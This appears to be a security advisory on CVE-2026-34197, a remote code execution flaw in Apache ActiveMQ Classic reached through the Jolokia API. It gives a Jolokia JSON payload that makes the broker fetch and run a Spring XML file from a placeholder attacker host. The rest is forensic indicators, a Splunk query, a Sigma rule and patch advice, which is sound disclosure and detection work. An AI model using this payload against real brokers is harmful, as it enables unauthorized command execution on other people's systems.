CVE-2026-34197: Apache ActiveMQ Classic Remote Code Execution

CVE-2026-34197 identifies a remote code execution (RCE) flaw in Apache ActiveMQ Classic. By invoking management operations via the Jolokia API, an attacker forces the broker to fetch and execute a remote Spring XML configuration file, leading to arbitrary OS command execution. This vulnerability has existed in the codebase for approximately 13 years.

Executive Summary

Apache ActiveMQ Classic is a Java message broker widely deployed in enterprise environments. CVE-2026-34197 exposes a critical RCE path by abusing the addNetworkConnector(String) operation on the broker MBean. The vulnerability allows an authenticated attacker—or an unauthenticated one on specific misconfigured versions—to force the broker to load an attacker-controlled remote Spring XML configuration, triggering arbitrary command execution via Spring’s MethodInvokingFactoryBean.

Technical Analysis

The ActiveMQ Classic broker exposes a web console on port 8161, which includes Jolokia, an HTTP-to-JMX bridge. Historically, security fixes attempted to restrict Jolokia to read-only operations for dangerous MBeans but provided a blanket allowance for ActiveMQ’s own MBeans.

The vulnerability stems from this operation=* allowance on the ActiveMQ Broker MBean. An attacker calls addNetworkConnector with a crafted URI. ActiveMQ’s VM transport (vm://) then uses this URI to instantiate a broker, accepting a brokerConfig parameter that supports external Spring XML files via xbean:http://.

Exploitation Flow

Exploitation involves a POST request to the Jolokia API endpoint.

Prepare a malicious Spring XML file on a remote server accessible to the target broker.

Send a POST request to http://TARGET:8161/api/jolokia/ with the following JSON payload:

{
  "type": "exec",
  "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
  "operation": "addNetworkConnector",
  "arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER_IP:8888/payload.xml)"]
}

The broker attempts to establish a network connection using the provided vm:// URI.
The BrokerFactory.createBroker() method processes the brokerConfig, loading and executing the malicious Spring XML, which triggers the command defined in MethodInvokingFactoryBean.

Forensic Investigation

Analysis of broker logs and process behavior is required.

Log Indicators

Search activemq.log for: Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://

Network Indicators

Identify unexpected outbound HTTP requests from the ActiveMQ Java process to external IP addresses.

API Indicators

Analyze web server logs for POST requests to /api/jolokia/ containing addNetworkConnector in the request body.

Detection

Threat hunting requires identifying the specific pattern used in the exploitation attempt.

Threat Hunting Query (Splunk/ELK)

index=activemq_logs "vm://rce?create=true&brokerConfig=xbean:http://"

Sigma Rule

title: Potential Apache ActiveMQ RCE via Jolokia
description: Detects exploitation of CVE-2026-34197 via Jolokia addNetworkConnector
logsource:
  product: activemq
detection:
  selection:
    message|contains: 'vm://rce?create=true&brokerConfig=xbean:http://'
  condition: selection
level: critical

Mitigation

Update to Apache ActiveMQ Classic versions 5.19.4 or 6.2.3. These versions remove the ability for addNetworkConnector to add vm:// transports. Additionally, ensure the web console is secured and default credentials are changed.